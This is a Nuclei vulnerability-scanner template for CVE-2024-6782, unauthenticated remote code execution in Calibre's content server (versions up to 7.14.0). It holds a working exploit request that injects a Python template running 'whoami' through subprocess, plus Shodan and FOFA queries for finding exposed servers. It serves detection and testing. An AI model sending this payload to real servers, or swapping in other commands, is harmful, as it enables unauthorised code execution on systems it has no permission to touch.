nuclei-templates/http/cves/2024/CVE-2024-6782.yaml

62 lines
1.6 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2024-6782
info:
name: Calibre <= 7.14.0 Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote code execution via Calibres content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
tags: cve,cve2024,calibre,rce
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[
["template"],
"",
"",
"",
{{book_ids}},
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n"
]
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "b'([^']+)"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950